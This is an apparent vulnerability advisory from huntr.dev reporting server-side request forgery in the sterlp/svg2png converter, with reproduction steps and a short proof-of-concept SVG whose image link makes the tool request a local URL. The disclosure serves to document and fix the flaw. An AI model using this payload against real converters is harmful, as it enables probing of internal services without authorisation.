Lucene search

K
huntrB1nslashsh1-OTHER-SVG2PNG
HistoryJan 28, 2021 - 12:00 a.m.

Server-Side Request Forgery (SSRF) in sterlp/svg2png

2021-01-2800:00:00
b1nslashsh
www.huntr.dev
9
svg conversion vulnerability
ssrf
xxe
java 8 required

EPSS

0.001

Percentile

37.3%

:book: Description

Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No “Web Service” needed, just an executable JAR file. this package is vulnerable to (XXE).

https://github.com/sterlp/svg2png

:recycle: Steps To Reproduce-:

  1. download and run latest release from https://github.com/sterlp/svg2png/releases
  2. You have to have Java 8 installed on your PC
  3. creat a payload svg or use : (this is a example of SSRF )https://drive.google.com/file/d/1jGhUXepvOV9bs_aaCThSmqloY_C1Nsj4/view?usp=sharing

rc3.svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" stroke-width="1" id="image3204" />
<rect x="0" y="150" height="10" width="300" style="fill: black"/>
</svg>

POC

gdrive

💥 Impact

SSRF

EPSS

0.001

Percentile

37.3%